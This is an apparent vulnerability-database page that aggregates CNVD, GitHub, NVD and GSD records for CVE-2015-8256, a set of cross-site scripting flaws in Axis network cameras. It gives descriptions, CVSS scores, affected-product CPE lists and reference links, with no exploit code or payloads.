"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "141674"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
}
],
"trust": 0.7
}
}
CNVD-2016-02645
Vulnerability from cnvd - Published: 2016-04-28
VLAI Severity ?
Title
Axis Network Cameras跨站脚本漏洞
Description
Axis网络视频可以直接通过IP网络传输和捕获现场映象,可以使用户利用WEB浏览器查看和管理摄象系统。
Axis Network Cameras存在跨站脚本漏洞。攻击者能够在受害者的浏览器和电脑上执行任意代码。
Severity
中
Formal description
目前没有详细的解决方案提供: http://www.axis.com/
Reference
https://www.exploit-db.com/exploits/39683/
Impacted products
| Name | Axis Communications Network Camera |
|---|
{
"cves": {
"cve": {
"cveNumber": "CVE-2015-8256"
}
},
"description": "Axis\u7f51\u7edc\u89c6\u9891\u53ef\u4ee5\u76f4\u63a5\u901a\u8fc7IP\u7f51\u7edc\u4f20\u8f93\u548c\u6355\u83b7\u73b0\u573a\u6620\u8c61\uff0c\u53ef\u4ee5\u4f7f\u7528\u6237\u5229\u7528WEB\u6d4f\u89c8\u5668\u67e5\u770b\u548c\u7ba1\u7406\u6444\u8c61\u7cfb\u7edf\u3002\r\n\r\nAxis Network Cameras\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u80fd\u591f\u5728\u53d7\u5bb3\u8005\u7684\u6d4f\u89c8\u5668\u548c\u7535\u8111\u4e0a\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002",
"discovererName": "SmithW from OrwellLabs",
"formalWay": "\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u7684\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\nhttp://www.axis.com/",
"isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
"number": "CNVD-2016-02645",
"openTime": "2016-04-28",
"products": {
"product": "Axis Communications Network Camera"
},
"referenceLink": "https://www.exploit-db.com/exploits/39683/",
"serverity": "\u4e2d",
"submitTime": "2016-04-22",
"title": "Axis Network Cameras\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e"
}
GHSA-V8Q7-9C5W-HCR4
Vulnerability from github – Published: 2022-05-17 02:48 – Updated: 2025-04-20 03:36
VLAI?
Details
Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.
Severity ?
6.1 (Medium)
{
"affected": [],
"aliases": [
"CVE-2015-8256"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-04-17T16:59:00Z",
"severity": "MODERATE"
},
"details": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.",
"id": "GHSA-v8q7-9c5w-hcr4",
"modified": "2025-04-20T03:36:11Z",
"published": "2022-05-17T02:48:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8256"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/39683"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/97699"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
FKIE_CVE-2015-8256
Vulnerability from fkie_nvd - Published: 2017-04-17 16:59 - Updated: 2025-04-20 01:37
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.
References
| URL | Tags | ||
|---|---|---|---|
| cret@cert.org | http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| cret@cert.org | http://www.securityfocus.com/bid/97699 | Third Party Advisory, VDB Entry | |
| cret@cert.org | https://www.exploit-db.com/exploits/39683/ | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/97699 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/39683/ | Exploit, Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| axis | network_camera_firmware | - | |
| axis | cannon_network_camera | - | |
| axis | explosion-protected_camera | - | |
| axis | fixed_box_camera | - | |
| axis | fixed_bullet_camera | - | |
| axis | fixed_dome_camera | - | |
| axis | modular_camera | - | |
| axis | onboard_camera | - | |
| axis | panoramic_camera | - | |
| axis | ptz_camera | - | |
| axis | thermal_camera | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:axis:network_camera_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A0DF2A88-D86A-4B29-9701-F42D588DD65D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:axis:cannon_network_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F988ABAB-7A62-44B6-BBA7-E079350FFA5A",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:explosion-protected_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A02A4019-B82C-45B2-8E3F-422B6793CE80",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:fixed_box_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "687F10FE-3833-4097-B36D-E103F1513FB6",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:fixed_bullet_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B5C685BB-6B80-4FD6-92B0-399251BD72E8",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:fixed_dome_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3FCAC47B-A1A8-45D6-A6CF-9A106CBFFDF5",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:modular_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "337DD1DE-CD3E-413E-90EB-4A65F0E122E8",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:onboard_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6C06CE35-E785-44CA-B79D-F0F15AECF7F5",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:panoramic_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2E644403-BFFC-4E4C-81BF-C9426094D862",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:ptz_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C3D7324F-3DF6-48F1-BF6D-0E884F3549AE",
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:axis:thermal_camera:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B41E47D3-D2D0-47B1-B748-B8E665AF0984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidad XSS en camaras Axis network."
}
],
"id": "CVE-2015-8256",
"lastModified": "2025-04-20T01:37:25.860",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-04-17T16:59:00.150",
"references": [
{
"source": "cret@cert.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/97699"
},
{
"source": "cret@cert.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/39683/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/97699"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/39683/"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GSD-2015-8256
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2015-8256",
"description": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.",
"id": "GSD-2015-8256",
"references": [
"https://packetstormsecurity.com/files/cve/CVE-2015-8256"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2015-8256"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.",
"id": "GSD-2015-8256",
"modified": "2023-12-13T01:20:03.147914Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2015-8256",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html"
},
{
"name": "39683",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/39683/"
},
{
"name": "97699",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/97699"
}
]
}
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:axis:network_camera_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:axis:onboard_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:ptz_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:thermal_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:panoramic_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:modular_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:fixed_dome_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:explosion-protected_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:fixed_box_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:fixed_bullet_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:axis:cannon_network_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2015-8256"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "39683",
"refsource": "EXPLOIT-DB",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/39683/"
},
{
"name": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html"
},
{
"name": "97699",
"refsource": "BID",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/97699"
}
]
}
},
"impact": {
"baseMetricV2": {
"cvssV2": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"userInteractionRequired": true
},
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
}
},
"lastModifiedDate": "2017-04-25T00:40Z",
"publishedDate": "2017-04-17T16:59Z"
}
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…